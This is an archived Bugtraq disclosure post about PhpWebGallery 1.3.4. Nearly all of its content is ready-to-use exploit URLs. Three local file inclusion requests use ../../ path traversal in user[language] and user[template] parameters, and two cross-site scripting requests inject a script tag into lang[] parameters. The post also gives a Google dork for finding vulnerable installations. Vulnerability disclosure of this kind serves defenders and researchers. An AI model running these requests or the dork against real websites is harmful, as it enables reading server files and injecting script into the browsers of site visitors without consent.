| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 11 Sep 2008 02:55:19 -0600
From: irancrash@...il.com
To: bugtraq@...urityfocus.com
Subject: PhpWebGallery 1.3.4 Multiple Vulnerabilities (XSS/LFI)
----------------------------------------------------------------
Script : PhpWebGallery 1.3.4
Type : Multiple Vulnerabilities (XSS/LFI)
Rist : High
Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Official Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Local File Inclusion Vulnerabilities :
Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
-----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=<script>alert(123);</script>
Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=<script>alert(123);</script>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
----------------------------------------------------------------
Powered by blists - more mailing lists